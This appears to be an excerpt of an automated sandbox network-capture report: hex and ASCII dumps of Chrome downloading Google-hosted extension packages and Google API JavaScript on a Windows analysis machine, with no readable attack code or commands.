                                                                                                                                                                                          2025-05-14 02:32:01 UTC1460INData Raw: 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 5c 75 30 30 33 64 62 7c 7c 64 6f 63 75 6d 65 6e 74 3b 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 3f 61 5c 75 30 30 33 64 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 61 29 5b 30 5d 3a 28 63 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2c 61 3f 61 5c 75 30 30 33 64 28 62 7c 7c 63 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c
                                                                                                                                                                                          Data Ascii: ion(a,b){var c\u003db||document;c.getElementsByClassName?a\u003dc.getElementsByClassName(a)[0]:(c\u003ddocument,a?a\u003d(b||c).querySelector(a?\".\"+a:\"\"):(b\u003db||c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]||null


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          4192.168.2.449740142.250.68.2254438080C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2025-05-14 02:32:03 UTC563OUTGET /crx/blobs/AR5vvTrJQX8o3yiAYG6sKMXlQIJkhUqWDOZZpkQIvZ8jdIlHo_-r-eEEvUfpiEjPeKJSMQSs6sUAg_iPrX6bF1LM5ZKoXL8s5lKqoV5XdDwl2S76g_QJo4kYFnGtCX3ltfS7AMZSmuUk0OfbOYBaoyXsXRiKixwOa7jJxw/EFAIDNBMNNNIBPCAJPCGLCLEFINDMKAJ_25_5_2_0.crx HTTP/1.1
                                                                                                                                                                                          host: clients2.googleusercontent.com
                                                                                                                                                                                          sec-fetch-site: none
                                                                                                                                                                                          sec-fetch-mode: no-cors
                                                                                                                                                                                          sec-fetch-dest: empty
                                                                                                                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                                                                                                                          accept-encoding: identity
                                                                                                                                                                                          accept-language: en-GB,en-US;q=0.9,en;q=0.8
                                                                                                                                                                                          priority: u=1, i
                                                                                                                                                                                          2025-05-14 02:32:03 UTC552INHTTP/1.1 200 OK
                                                                                                                                                                                          x-guploader-uploadid: AAO2Vwq8DWmIkeVtxP4xKa8Gs65lH168J9x81W5Gc7iXbjpOu1nGEzl5eHbdRdPHWvGbGVltYi82aY8
                                                                                                                                                                                          accept-ranges: bytes
                                                                                                                                                                                          content-length: 2840267
                                                                                                                                                                                          x-goog-hash: crc32c=RfuvSA==
                                                                                                                                                                                          server: UploadServer
                                                                                                                                                                                          date: Tue, 13 May 2025 07:50:55 GMT
                                                                                                                                                                                          expires: Wed, 13 May 2026 07:50:55 GMT
                                                                                                                                                                                          cache-control: public, max-age=31536000
                                                                                                                                                                                          age: 67267
                                                                                                                                                                                          last-modified: Thu, 08 May 2025 17:28:24 GMT
                                                                                                                                                                                          etag: e86ca39c_3dfe6c55_dcecd4f8_a8f12e87_8de08c6e
                                                                                                                                                                                          content-type: application/x-chrome-extension
                                                                                                                                                                                          alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                          2025-05-14 02:32:03 UTC1460INData Raw: 43 72 32 34 03 00 00 00 1a 04 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 8f fb bf 5c 37 63 94 3c b0 ee 01 c4 b5 a6 9a b1 9f 46 74 6f 16 38 a0 32 27 35 dd f0 71 6b 0e dc f6 25 cb b2 ed ea fb 32 d5 af 1e 03 43 03 46 f0 a7 39 db 23 96 1d 65 e5 78 51 f0 84 b0 0e 12 ac 0e 5b dc c9 d6 4c 7c 00 d5 b8 1b 88 33 3e 2f da eb aa f7 1a 75 c2 ae 3a 54 de 37 8f 10 d2 28 e6 84 79 4d 15 b4 f3 bd 3f 56 d3 3c 3f 18 ab fc 2e 05 c0 1e 08 31 b6 61 d0 fd 9f 4f 3f 64 0d 17 93 bc ad 41 c7 48 be 00 27 a8 4d 70 42 92 05 54 a6 6d b8 de 56 6e 20 49 70 ee 10 3e 6b d2 7c 31 bd 1b 6e a4 3c 46 62 9f 08 66 93 f9 2a 51 31 a8 db b5 9d b9 0f 73 e8 a0 09 32 01 e9 7b 2a 8a 36 a0 cf 17 b0 50 70 9d a2 f9 a4 6f 62 4d
                                                                                                                                                                                          Data Ascii: Cr240"0*H0\7c<Fto82'5qk%2CF9#exQ[L|3>/u:T7(yM?V<?.1aO?dAH'MpBTmVn Ip>k|1n<Fbf*Q1s2{*6PpobM
                                                                                                                                                                                          2025-05-14 02:32:03 UTC1460INData Raw: 1a 21 a0 f2 18 c1 79 e6 ff dd 32 23 8f ec 3f 2c 28 04 ac c9 f6 96 b3 85 b1 a2 70 d6 06 46 79 64 52 bd 57 67 39 1c 46 4f d2 24 1b d9 d6 e8 49 45 d3 02 03 4b d2 1a 2d ec ad 61 61 ac 87 98 e2 e8 29 b2 66 e0 56 d5 5c 32 11 31 ca 95 27 37 b7 de d5 af 18 c7 5a df 6c 14 a3 2c e3 fb 93 ae 11 db 60 77 13 81 56 a4 0d 94 7a 3a 02 1e e3 a0 3c 35 11 82 57 13 91 e7 05 ff 0c 95 a1 78 fc b1 47 df 66 d7 f9 07 7e d8 b5 fc 31 88 e9 b8 e8 b3 cf a1 b1 6d 70 22 6a b6 cd a0 18 88 8a d2 bb 23 7f fb c5 63 28 0e 84 47 9e 05 ee ec ca 76 e7 7e 70 c6 bd 24 1c 1b b2 df a1 f2 b8 fd 93 40 85 50 c8 13 88 57 62 28 18 f1 67 2c ba b5 47 33 11 21 b6 dc 84 0a 31 8a 62 2a 46 e3 a2 3f e3 b8 74 ba 05 65 64 08 13 d1 f1 64 5a 65 49 52 f6 4c 50 f2 45 d3 61 38 1b cf 7a 14 4c 40 50 2d 77 7c b4 3e d4
                                                                                                                                                                                          Data Ascii: !y2#?,(pFydRWg9FO$IEK-aa)fV\21'7Zl,`wVz:<5WxGf~1mp"j#c(Gv~p$@PWb(g,G3!1b*F?teddZeIRLPEa8zL@P-w|>
                                                                                                                                                                                          2025-05-14 02:32:03 UTC1460INData Raw: 00 76 69 65 77 65 72 2e 68 74 6d 6c 55 54 05 00 01 ee 88 1d 68 0a 00 20 00 00 00 00 00 01 00 18 00 00 6b 8e 7f 9d c0 db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ad 54 c1 6e db 38 10 bd fb 2b a6 3a 16 96 e4 0d 50 a0 cd 5a 01 bc 8e 0b 18 28 92 a2 4d 80 ee 69 41 93 63 69 5a 8a 54 c9 b1 1d b5 e8 bf ef 50 72 dc 78 03 14 7b 28 7d 30 c9 99 79 f3 f8 1e a9 f9 8b eb db e5 dd df ef 57 d0 70 6b af 26 f3 17 79 3e 29 5f fe ae 31 91 1f 2c ae 6f ff 5a c1 f2 f6 e6 ed fa 7a 75 73 b7 5e bc 93 cd 7f 9e 8f 21 19 96 be eb 03 d5 0d c3 c5 ec 62 06 0b e3 37 08 1f fb c8 d8 46 58 3b ed 43 e7 83 62 34 29 79 61 2d 7c 48 c9 11 3e 60 c4 b0 47 53 0c 30 37 b7 77 eb e5 ea 72 cc 20 b7 f5 a1 55 4c de 81 f6 8e 15 39 34 d0 60 40 72 40 71 0a ca 19 08 d8 ca 7e 94 5a 6e 10 ba e0 3b 0c
                                                                                                                                                                                          Data Ascii: viewer.htmlUTh kTn8+:PZ(MiAciZTPrx{(}0yWpk&y>)_1,oZzus^!b7FX;Cb4)ya-|H>`GS07wr UL94`@r@q~Zn;
                                                                                                                                                                                          2025-05-14 02:32:03 UTC1460INData Raw: 86 33 3a 30 f3 b1 b0 11 4d 9f ae 4f a6 d6 51 8a b2 2a d7 18 c6 b6 39 7e e9 4c c1 12 06 d7 b1 0b cf ae 1b 7d ee ae f0 36 4f b3 9d 29 65 c4 f8 d1 57 8e d1 38 c7 ee 5e e5 bb 3b bd 9f d6 7c ec 66 cb c7 19 9d a9 c9 0d d0 93 5c 46 4f c6 27 f0 b7 a0 bc 1b d2 8d 6c cb 26 49 1e 29 a2 0d 27 a9 2d c2 6b d6 99 f8 df 51 a5 29 0b 84 5c d7 44 35 79 43 f8 e9 e5 5f 64 66 f8 ff 0c 58 7d ce a8 d2 83 b5 9c 5a 9f 33 94 72 2e 50 92 17 48 ce 03 75 90 62 46 30 26 18 36 31 35 b9 f0 3f de bd 7a fd 41 54 49 fe 4e 50 ae ad c6 ab 70 8d ab 51 bd 3e 3d bb b2 fb ab dc cb 2c 17 8c 66 74 46 19 d5 cb 6b c7 cf c3 ed a3 b5 a4 b3 ca 18 e9 be 23 3a e5 10 75 9a 9c 23 60 6f fc 87 d9 f4 ec e6 3c cc 45 dc 6f eb 29 c1 d0 3c ea a2 03 71 94 df c0 2e 73 66 86 2b 2f 53 09 a9 50 20 b0 84 dc c5 4e 3d 17
                                                                                                                                                                                          Data Ascii: 3:0MOQ*9~L}6O)eW8^;|f\FO'l&I)'-kQ)\D5yC_dfX}Z3r.PHubF0&615?zATINPpQ>=,ftFk#:u#`o<Eo)<q.sf+/SP N=
                                                                                                                                                                                          2025-05-14 02:32:03 UTC1460INData Raw: 00 00 00 00 0b 00 2d 00 73 63 68 65 6d 61 2e 6a 73 6f 6e 55 54 05 00 01 ee 88 1d 68 0a 00 20 00 00 00 00 00 01 00 18 00 00 6b 8e 7f 9d c0 db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 90 cd 4e c3 30 10 84 ef 79 8a 55 2e 5c 2a 7a e7 56 09 89 f6 80 40 a2 3c 80 93 ac 13 23 d7 6b d9 6b 95 a8 ea bb 63 3b 21 fd 51 10 39 f8 32 3b b3 3b 9f 4f 05 40 c9 bd c5 f2 09 4a aa be b0 e6 72 95 34 eb c8 a2 63 85 3e 4e 4e 51 89 da 9b 45 b3 45 6d bf 27 29 85 15 eb 9c 4e 53 e8 d2 18 58 54 8f 79 4d 76 34 e8 6b a7 2c 2b 32 c9 b7 93 e0 91 81 09 a4 d0 1e 81 bb 98 53 0c 47 32 0f 0c 34 6d b9 da f0 5b d0 b3 53 a6 2d b3 7c 1e a6 e5 a7 17 2d be a2 f0 c1 e1 01 0d cf 76 db 07 67 80 cc 9a a4 84 90 02 b0 31 42 f7 ac 6a ff 67 cf 3d 41 a3 bc a8 34 8e 91 c3 e5 c8 2a 23 dc 9f be 30
                                                                                                                                                                                          Data Ascii: -schema.jsonUTh kN0yU.\*zV@<#kkc;!Q92;;O@Jr4c>NNQEEm')NSXTyMv4k,+2SG24m[S-|-vg1Bjg=A4*#0
                                                                                                                                                                                          2025-05-14 02:32:03 UTC1460INData Raw: 8c 2f 64 4e d4 8b d6 13 3d af 19 b9 a0 f0 e1 cc 99 d5 53 a5 6c 71 9e ce 60 9a 3a a6 54 4e e2 7b 4a ee cb dd 55 14 9e 86 f1 59 6b 4b ab be 56 0a 1d b1 23 b2 6c 73 ee 28 a2 f3 3f 2b 65 df 74 62 1f ce a9 a3 04 c0 16 8d d4 45 e1 08 6a c2 ed 81 c3 f3 f3 73 7d 74 14 b1 ae 9a 60 f7 75 45 31 94 ad e3 38 a9 4d 3b 14 61 c7 92 ca 6a 74 54 08 63 69 a0 5c 64 e3 e4 a9 4a 6a 77 a7 7f 84 2e 8d 36 17 ae e3 64 08 31 37 c0 7d 24 b5 27 f4 f6 5d 9c b0 79 34 e4 f4 d0 69 bc 07 ff a7 f5 d4 5f d5 57 ad bf 8f 71 ba b8 71 c2 39 2a 6d 4a b8 a4 8e 43 7f 4f f9 24 d2 51 ba db df 05 7f 80 10 63 46 41 8f 6e 3a ac a3 62 07 6e 70 95 e5 74 31 5b 3d c3 cf 0e 29 bf af 08 b2 05 f5 d1 00 cc f3 e1 00 35 14 85 4c 3e 94 31 39 0c 30 bc 84 38 cc 01 6d 75 bc 3e d6 3d ae a5 55 25 66 27 54 45 11 32 5f
                                                                                                                                                                                          Data Ascii: /dN=Slq`:TN{JUYkKV#ls(?+etbEjs}t`uE18M;ajtTci\dJjw.6d17}$']y4i_Wqq9*mJCO$QcFAn:bnpt1[=)5L>1908mu>=U%f'TE2_
                                                                                                                                                                                          2025-05-14 02:32:03 UTC1460INData Raw: e1 e9 d8 b6 9e 90 d3 ad ea 69 af f5 6e 0c b0 55 23 0a 82 de a3 95 a3 f1 7d bb a0 ad 03 59 7d 53 14 8b ad aa 2f 4c 2a 3e 53 19 1e 18 98 50 0c 77 20 f1 3f 30 54 7e 01 e9 6b 8d e9 40 35 36 be ab ab 83 5d 07 3f c7 2f e3 7e eb 31 ea 9c 43 80 27 35 08 d2 73 b7 c3 a3 22 e7 d1 16 d3 39 99 33 8b 82 cb 60 22 6c 1c 42 42 cb 28 10 59 fd ff 1e 99 37 27 cd 1f 16 94 12 36 14 86 c8 35 42 a9 29 5d 1d 83 aa 18 d5 d4 1d ed 55 8f 6e 23 93 f1 39 46 8d 55 98 ac f8 0e 54 b8 23 e7 30 c0 31 78 05 53 1e 52 8b 13 93 28 33 e8 51 35 3a 32 1b a9 2a ee 2e 69 ee 39 36 1f 04 a7 ac 9f b6 aa 51 59 ea fd c9 d7 48 63 08 87 69 81 a1 d0 c2 2e ba 0e ac 37 29 4d 0b 93 49 4a 67 cb 77 c2 53 99 34 ff 55 f8 ae 11 7b 64 6d 05 5d 93 1c 11 90 9b 16 87 18 0f 1e cb 2e fa 58 9a a3 d4 91 e9 37 96 79 bb 80
                                                                                                                                                                                          Data Ascii: inU#}Y}S/L*>SPw ?0T~k@56]?/~1C'5s"93`"lBB(Y7'65B)]Un#9FUT#01xSR(3Q5:2*.i96QYHci.7)MIJgwS4U{dm].X7y
                                                                                                                                                                                          2025-05-14 02:32:03 UTC1460INData Raw: 61 49 75 c8 b6 fb 6a 4f 00 21 9f 96 1b b0 dc 0c a9 52 68 5c ef 11 9b e1 0c 43 c0 5b bf 0b db 33 8f e8 c6 d6 d3 f9 fe bd e2 a3 7a a0 c1 f1 da cc dd 1c 25 32 34 16 9a 88 a5 eb f9 cb 46 30 aa df fd f3 f7 cb 23 94 7e c3 0f df bb d1 c1 9b f6 76 4e df de ea b9 78 b0 fb 1f 79 76 e7 37 47 2e f5 f0 1e 5b 5f 61 85 a7 1c 57 ba 7a c4 c4 a3 bd ce f9 d5 54 db a1 71 f0 12 de 11 e4 4f fc 52 e1 b0 6b 77 e3 d8 4e bf 5a bc df dd 09 59 b3 60 5c 76 3e 05 9e ef d4 99 fa 2f f8 79 1a 51 58 1b 5e ed 3e 24 bb 04 a2 a2 6e 2d 28 62 ed 7f 01 50 4b 07 08 2d 3a f5 48 43 04 00 00 49 09 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 13 00 2d 00 73 77 5f 6d 6f 64 75 6c 65 73 2f 70 72 6f 78 79 2e 6a 73 55 54 05 00 01 ee 88 1d 68 0a 00 20 00 00 00 00 00
                                                                                                                                                                                          Data Ascii: aIujO!Rh\C[3z%24F0#~vNxyv7G.[_aWzTqORkwNZY`\v>/yQX^>$n-(bPK-:HCIPK!-sw_modules/proxy.jsUTh
                                                                                                                                                                                          2025-05-14 02:32:03 UTC1460INData Raw: c1 f9 f5 6f 23 63 78 7d 75 31 3e 1f 5d cd c6 83 4b 34 de 77 3f 3f 90 b0 31 8c 93 8d 14 8b a5 36 de bd 79 fb de 18 04 f1 23 37 a6 1b a5 f9 4a 19 e3 c8 8f 65 12 4b a6 79 40 c2 83 30 34 26 24 ac 8c 09 57 5c ae 79 e0 e6 d3 5c 5d cf c6 c3 91 57 48 88 68 1e cb 15 d3 22 8e 0c 3f 8e 34 13 11 0f 8c 25 97 5c 44 86 50 8e c1 a2 c0 90 7c 85 76 85 b1 7a c9 8d 44 c6 09 97 7a 63 c4 f3 57 54 c8 07 0a 2c ae d2 24 09 05 97 ca c1 78 31 47 fb c6 35 8c 19 26 12 91 e6 61 c8 7d 9d b2 30 17 d7 dc 5f 46 c2 c7 13 54 f1 79 82 d1 b5 4e 18 5c 6a c5 64 a1 83 14 5c 33 b9 31 74 fc 1d 6a 60 78 ad 48 de 56 ce 82 25 49 ea 71 63 30 58 83 91 84 cf 1e c3 96 72 f5 96 43 f6 54 ec 23 f2 c3 34 10 d1 c2 d0 92 05 dc 50 dc 97 5c e7 13 c7 12 4a 57 e7 44 f2 b0 ba 71 2e 94 e2 2b 11 15 86 86 e1 f4 52 a8
                                                                                                                                                                                          Data Ascii: o#cx}u1>]K4w??16y#7JeKy@04&$W\y\]WHh"?4%\DP|vzDzcWT,$x1G5&a}0_FTyN\jd\31tj`xHV%Iqc0XrCT#4P\JWDq.+R
                                                                                                                                                                                          2025-05-14 02:32:03 UTC1460INData Raw: 9b 8c 9f 14 65 1d ed ed f4 f3 e0 48 07 06 66 70 29 ef b5 d5 4c aa d3 64 1c 9a bb 25 cc 97 96 a8 45 61 e5 d2 e9 6a a6 50 61 19 d9 09 a0 7d c4 9f 9f df c0 d9 9a e0 0e b6 54 6c bf 04 f4 a3 b7 bd 26 58 23 c3 2b 7c f5 b8 ab 91 4b 11 64 ab a4 7f 8e 99 dd 28 7e 82 2f 73 e4 cf 3c 55 a9 06 e7 da 96 6d f7 11 5b 71 8f 57 38 a9 3c e9 ac 80 5f 5e 4c 11 bd d5 40 c0 be 74 e2 e6 c0 af 90 5e 17 11 bf 55 d4 cf 74 fc 08 64 28 48 5b 27 e9 f3 43 54 45 1f e0 29 ea 00 4d 69 ec a2 79 12 8b cb 86 50 be 5f b3 3b 78 e7 f9 fb 4e ad ed 5e 61 38 09 56 06 c6 25 c7 c1 d9 c3 4e e1 7b 72 87 a2 39 7b f0 cc 46 07 91 30 b3 b7 d3 43 3a ff 98 5e 5f b9 54 9f 46 0b 31 27 ca 60 b7 f3 11 15 f3 2a 0e 41 24 e2 85 65 8e a4 44 c1 8a 7a be f4 01 2a a6 6b 0e 89 5a b8 58 08 8e 6c 3b 47 6f b3 32 5d 77 63
                                                                                                                                                                                          Data Ascii: eHfp)Ld%EajPa}Tl&X#+|Kd(~/s<Um[qW8<_^L@t^Utd(H['CTE)MiyP_;xN^a8V%N{r9{F0C:^_TF1'`*A$eDz*kZXl;Go2]wc
                                                                                                                                                                                          2025-05-14 02:32:19 UTC561OUTGET /crx/blobs/AR5vvTq3D5vfs1yj2BnXdOyoB_sQ4V5rAB-UVgv02BkAIKpatzFha6ZtTSHtDWl-MbrYwfWmX5Uql10vGXRnasmn8vq26kcwSL6jBHFK6iHJRnYYkOt80wyeiYX1aHekXxQAxlKa5fXo6vnABHtTfyBvsMKEcsxdW7Gh/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_91_1_0.crx HTTP/1.1
                                                                                                                                                                                          host: clients2.googleusercontent.com
                                                                                                                                                                                          sec-fetch-site: none
                                                                                                                                                                                          sec-fetch-mode: no-cors
                                                                                                                                                                                          sec-fetch-dest: empty
                                                                                                                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                                                                                                                          accept-encoding: identity
                                                                                                                                                                                          accept-language: en-GB,en-US;q=0.9,en;q=0.8
                                                                                                                                                                                          priority: u=1, i
                                                                                                                                                                                          2025-05-14 02:32:19 UTC551INHTTP/1.1 200 OK
                                                                                                                                                                                          x-guploader-uploadid: AAO2Vwok6Yh3CCu2JPMLVwOUFiGQlv_b8EnmlmdztEt2iPSDsqsjfqc3smTPDe2BUuVzVWMlHCziqvA
                                                                                                                                                                                          accept-ranges: bytes
                                                                                                                                                                                          content-length: 156893
                                                                                                                                                                                          x-goog-hash: crc32c=Un+eAg==
                                                                                                                                                                                          server: UploadServer
                                                                                                                                                                                          date: Tue, 13 May 2025 19:08:52 GMT
                                                                                                                                                                                          expires: Wed, 13 May 2026 19:08:52 GMT
                                                                                                                                                                                          cache-control: public, max-age=31536000
                                                                                                                                                                                          age: 26607
                                                                                                                                                                                          last-modified: Mon, 14 Apr 2025 19:08:39 GMT
                                                                                                                                                                                          etag: 3bbec759_f9d76cec_c759100d_d8db151f_5ed94a53
                                                                                                                                                                                          content-type: application/x-chrome-extension
                                                                                                                                                                                          alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          5192.168.2.449745142.250.69.144438080C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2025-05-14 02:32:04 UTC675OUTGET /_/scs/abc-static/_/js/k=gapi.gapi.en.F939Du45chc.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8uI5v7Xlp-b-Z4Th_hAAVtm2lZOw/cb=gapi.loaded_0 HTTP/1.1
                                                                                                                                                                                          host: apis.google.com
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          accept: */*
                                                                                                                                                                                          x-client-data: CNOVywE=
                                                                                                                                                                                          sec-fetch-site: cross-site
                                                                                                                                                                                          sec-fetch-mode: no-cors
                                                                                                                                                                                          sec-fetch-dest: script
                                                                                                                                                                                          sec-fetch-storage-access: active
                                                                                                                                                                                          accept-encoding: identity
                                                                                                                                                                                          accept-language: en-GB,en-US;q=0.9,en;q=0.8
                                                                                                                                                                                          2025-05-14 02:32:04 UTC897INHTTP/1.1 200 OK
                                                                                                                                                                                          accept-ranges: bytes
                                                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                                                          content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access
                                                                                                                                                                                          cross-origin-resource-policy: cross-origin
                                                                                                                                                                                          cross-origin-opener-policy: same-origin; report-to="social-frontend-mpm-access"
                                                                                                                                                                                          report-to: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]}
                                                                                                                                                                                          content-length: 117306
                                                                                                                                                                                          x-content-type-options: nosniff
                                                                                                                                                                                          server: sffe
                                                                                                                                                                                          x-xss-protection: 0
                                                                                                                                                                                          date: Wed, 07 May 2025 18:51:49 GMT
                                                                                                                                                                                          expires: Thu, 07 May 2026 18:51:49 GMT
                                                                                                                                                                                          cache-control: public, max-age=31536000
                                                                                                                                                                                          last-modified: Mon, 28 Apr 2025 16:56:11 GMT
                                                                                                                                                                                          content-type: text/javascript; charset=UTF-8
                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                          age: 546015
                                                                                                                                                                                          alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                          2025-05-14 02:32:04 UTC1460INData Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 5d 29 3b 0a 76 61 72 20 64 61 2c 69 61 2c 6c 61 2c 70 61 2c 74 61 2c 76 61 2c 44 61 2c 45 61 3b 64 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76
                                                                                                                                                                                          Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);var da,ia,la,pa,ta,va,Da,Ea;da=function(a){v
                                                                                                                                                                                          2025-05-14 02:32:04 UTC1460INData Raw: 31 36 41 72 72 61 79 20 55 69 6e 74 31 36 41 72 72 61 79 20 49 6e 74 33 32 41 72 72 61 79 20 55 69 6e 74 33 32 41 72 72 61 79 20 46 6c 6f 61 74 33 32 41 72 72 61 79 20 46 6c 6f 61 74 36 34 41 72 72 61 79 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 63 3d 30 3b 63 3c 62 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 7b 76 61 72 20 64 3d 5f 2e 6e 61 5b 62 5b 63 5d 5d 3b 74 79 70 65 6f 66 20 64 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 79 70 65 6f 66 20 64 2e 70 72 6f 74 6f 74 79 70 65 5b 61 5d 21 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 69 61 28 64 2e 70 72 6f 74 6f 74 79 70 65 2c 61 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 61 28 64 61 28 74 68 69
                                                                                                                                                                                          Data Ascii: 16Array Uint16Array Int32Array Uint32Array Float32Array Float64Array".split(" "),c=0;c<b.length;c++){var d=_.na[b[c]];typeof d==="function"&&typeof d.prototype[a]!="function"&&ia(d.prototype,a,{configurable:!0,writable:!0,value:function(){return ta(da(thi
                                                                                                                                                                                          2025-05-14 02:32:04 UTC1460INData Raw: 61 6e 63 65 6f 66 20 65 3f 68 3a 6e 65 77 20 65 28 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 6b 28 68 29 7d 29 7d 69 66 28 61 29 72 65 74 75 72 6e 20 61 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 77 50 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 69 66 28 74 68 69 73 2e 41 66 3d 3d 6e 75 6c 6c 29 7b 74 68 69 73 2e 41 66 3d 5b 5d 3b 76 61 72 20 6b 3d 74 68 69 73 3b 74 68 69 73 2e 78 50 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6b 2e 44 38 28 29 7d 29 7d 74 68 69 73 2e 41 66 2e 70 75 73 68 28 68 29 7d 3b 76 61 72 20 64 3d 5f 2e 6e 61 2e 73 65 74 54 69 6d 65 6f 75 74 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 78 50 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 64 28 68 2c 30 29 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 44 38 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 3b 74 68 69 73 2e
                                                                                                                                                                                          Data Ascii: anceof e?h:new e(function(k){k(h)})}if(a)return a;b.prototype.wP=function(h){if(this.Af==null){this.Af=[];var k=this;this.xP(function(){k.D8()})}this.Af.push(h)};var d=_.na.setTimeout;b.prototype.xP=function(h){d(h,0)};b.prototype.D8=function(){for(;this.
